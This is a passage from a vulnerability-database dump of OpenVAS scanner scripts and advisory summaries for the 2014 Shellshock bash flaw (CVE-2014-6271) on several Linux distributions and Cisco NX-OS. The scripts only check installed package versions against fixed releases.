exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:39:41", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201409-09", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121272", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121272", "title": "Gentoo Security Advisory GLSA 201409-09", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-09.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121272\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:54 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-09\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-09\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-09\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p18\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:55:29", "bulletinFamily": "scanner", "description": "Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.", "modified": "2018-04-06T00:00:00", "published": "2014-09-24T00:00:00", "id": "OPENVAS:1361412562310703032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703032", "title": "Debian Security Advisory DSA 3032-1 (bash - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3032.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3032-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703032\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_name(\"Debian Security Advisory DSA 3032-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-24 00:00:00 +0200 (Wed, 24 Sep 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3032.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:55:37", "bulletinFamily": "scanner", "description": "Check for the Version of bash", "modified": "2018-04-06T00:00:00", "published": "2014-09-25T00:00:00", "id": "OPENVAS:1361412562310882028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882028", "title": "CentOS Update for bash CESA-2014:1293 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1293 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882028\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-25 05:58:33 +0200 (Thu, 25 Sep 2014)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1293 centos6 \");\n script_tag(name: \"insight\", value: \"The GNU Bourne Again shell (Bash) is a\nshell and command language interpreter compatible with the Bourne shell (sh).\nBash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\");\n script_tag(name: \"affected\", value: \"bash on CentOS 6\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"CESA\", value: \"2014:1293\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-September/020585.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of bash\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2014-09-25T00:00:00", "id": "OPENVAS:1361412562310871248", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871248", "title": "RedHat Update for bash RHSA-2014:1293-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bash RHSA-2014:1293-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871248\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-25 05:58:11 +0200 (Thu, 25 Sep 2014)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for bash RHSA-2014:1293-01\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nlinked Knowledgebase article.\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1293-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00048.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2.45~5.el7_0.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.el6_5.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~3.2~33.el5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:37:36", "bulletinFamily": "scanner", "description": "On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability\n is related to the way in which shell functions are passed though environment variables. The\n vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell\n is invoked. The Bash shell may be invoked by a number of processes including, but not limited to,\n telnet, SSH, DHCP, and scripts hosted on web servers.\n\n All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the\n specific impact is determined by the characteristics of the process using the Bash shell. In the\n worst case, an unauthenticated remote attacker would be able to execute commands on an affected\n server. However, in most cases involving Cisco products, authentication is required before\n exploitation could be attempted.\n\n A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is\n a third-party software component that is part of the GNU software project and used by a number of\n software vendors. As of this version of the Security Advisory, there have been a number of\n vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. For\n vulnerable products, Cisco has included information on the product versions that will contain the\n fixed software, and the date these versions are expected to be published on the cisco.com download\n page. This advisory will be updated as additional information becomes available. Cisco may release\n free software updates that address this vulnerability if a product is determined to be affected by\n this vulnerability. This advisory is available at the references.", "modified": "2018-10-18T00:00:00", "published": "2016-05-12T00:00:00", "id": "OPENVAS:1361412562310105693", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105693", "title": "Cisco NX-OS: GNU Bash Environment Variable Command Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_nx_os_cisco-sa-20140926-bash.nasl 11961 2018-10-18 10:49:40Z asteins $\n#\n# GNU Bash Environment Variable Command Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:nx-os\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105693\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11961 $\");\n\n script_name(\"Cisco NX-OS: GNU Bash Environment Variable Command Injection Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=35836\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35880\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35845\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35879\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35860\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35861\");\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/viewAlert.x?alertId=35816\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability\n is related to the way in which shell functions are passed though environment variables. The\n vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell\n is invoked. The Bash shell may be invoked by a number of processes including, but not limited to,\n telnet, SSH, DHCP, and scripts hosted on web servers.\n\n All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the\n specific impact is determined by the characteristics of the process using the Bash shell. In the\n worst case, an unauthenticated remote attacker would be able to execute commands on an affected\n server. However, in most cases involving Cisco products, authentication is required before\n exploitation could be attempted.\n\n A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is\n a third-party software component that is part of the GNU software project and used by a number of\n software vendors. As of this version of the Security Advisory, there have been a number of\n vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. For\n vulnerable products, Cisco has included information on the product versions that will contain the\n fixed software, and the date these versions are expected to be published on the cisco.com download\n page. This advisory will be updated as additional information becomes available. Cisco may release\n free software updates that address this vulnerability if a product is determined to be affected by\n this vulnerability. This advisory is available at the references.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:49:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:45:58 +0200 (Thu, 12 May 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_nx_os_version.nasl\");\n script_mandatory_keys(\"cisco_nx_os/version\", \"cisco_nx_os/model\", \"cisco_nx_os/device\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\nif( ! device = get_kb_item( \"cisco_nx_os/device\" ) ) exit( 0 );\nif( \"Nexus\" >!< device ) exit( 0 );\n\nif ( ! nx_model = get_kb_item( \"cisco_nx_os/model\" ) ) exit( 0 );\n\nif( \"1000V\" >< nx_model )\n{\n affected = make_list(\n\t\t\t\"4.0(4)SV1(1)\",\n\t\t\t\"4.0(4)SV1(2)\",\n\t\t\t\"4.0(4)SV1(3)\",\n\t\t\t\"4.0(4)SV1(3a)\",\n\t\t\t\"4.0(4)SV1(3b)\",\n\t\t\t\"4.0(4)SV1(3c)\",\n\t\t\t\"4.0(4)SV1(3d)\",\n\t\t\t\"4.2(1)SV1(4)\",\n\t\t\t\"4.2(1)SV1(4a)\",\n\t\t\t\"4.2(1)SV1(4b)\",\n\t\t\t\"4.2(1)SV1(5.1)\",\n\t\t\t\"4.2(1)SV1(5.1a)\",\n\t\t\t\"4.2(1)SV1(5.2)\",\n\t\t\t\"4.2(1)SV1(5.2b)\",\n\t\t\t\"4.2(1)SV2(1.1)\",\n\t\t\t\"4.2(1)SV2(1.1a)\",\n\t\t\t\"4.2(1)SV2(2.1)\",\n\t\t\t\"4.2(1)SV2(2.1a)\"\n\t\t);\n}\n\nif( nx_model =~ \"^3[0-9]+\" )\n{\n affected = make_list(\n\t\t\t\"5.0(3)U1(1)\",\n\t\t\t\"5.0(3)U1(1a)\",\n\t\t\t\"5.0(3)U1(1b)\",\n\t\t\t\"5.0(3)U1(1d)\",\n\t\t\t\"5.0(3)U1(2)\",\n\t\t\t\"5.0(3)U1(2a)\",\n\t\t\t\"5.0(3)U2(1)\",\n\t\t\t\"5.0(3)U2(2)\",\n\t\t\t\"5.0(3)U2(2a)\",\n\t\t\t\"5.0(3)U2(2b)\",\n\t\t\t\"5.0(3)U2(2c)\",\n\t\t\t\"5.0(3)U2(2d)\",\n\t\t\t\"5.0(3)U3(1)\",\n\t\t\t\"5.0(3)U3(2)\",\n\t\t\t\"5.0(3)U3(2a)\",\n\t\t\t\"5.0(3)U3(2b)\",\n\t\t\t\"5.0(3)U4(1)\",\n\t\t\t\"5.0(3)U5(1)\",\n\t\t\t\"5.0(3)U5(1a)\",\n\t\t\t\"5.0(3)U5(1b)\",\n\t\t\t\"5.0(3)U5(1c)\",\n\t\t\t\"5.0(3)U5(1d)\",\n\t\t\t\"5.0(3)U5(1e)\",\n\t\t\t\"5.0(3)U5(1f)\",\n\t\t\t\"5.0(3)U5(1g)\",\n\t\t\t\"5.0(3)U5(1h)\",\n\t\t\t\"6.0(2)U1(1)\",\n\t\t\t\"6.0(2)U1(1a)\",\n\t\t\t\"6.0(2)U1(2)\",\n\t\t\t\"6.0(2)U1(3)\",\n\t\t\t\"6.0(2)U4(1)\"\n\t\t);\n}\n\nif( nx_model =~ \"^4[0-9]+\" )\n{\n affected = make_list(\n\t\t\t\"4.1(2)E1(1)\",\n\t\t\t\"4.1(2)E1(1b)\",\n\t\t\t\"4.1(2)E1(1d)\",\n\t\t\t\"4.1(2)E1(1e)\",\n\t\t\t\"4.1(2)E1(1f)\",\n\t\t\t\"4.1(2)E1(1g)\",\n\t\t\t\"4.1(2)E1(1h)\",\n\t\t\t\"4.1(2)E1(1i)\",\n\t\t\t\"4.1(2)E1(1j)\"\n\t\t);\n}\n\nif( nx_model =~ \"^5[0-9]+\" )\n{\n affected = 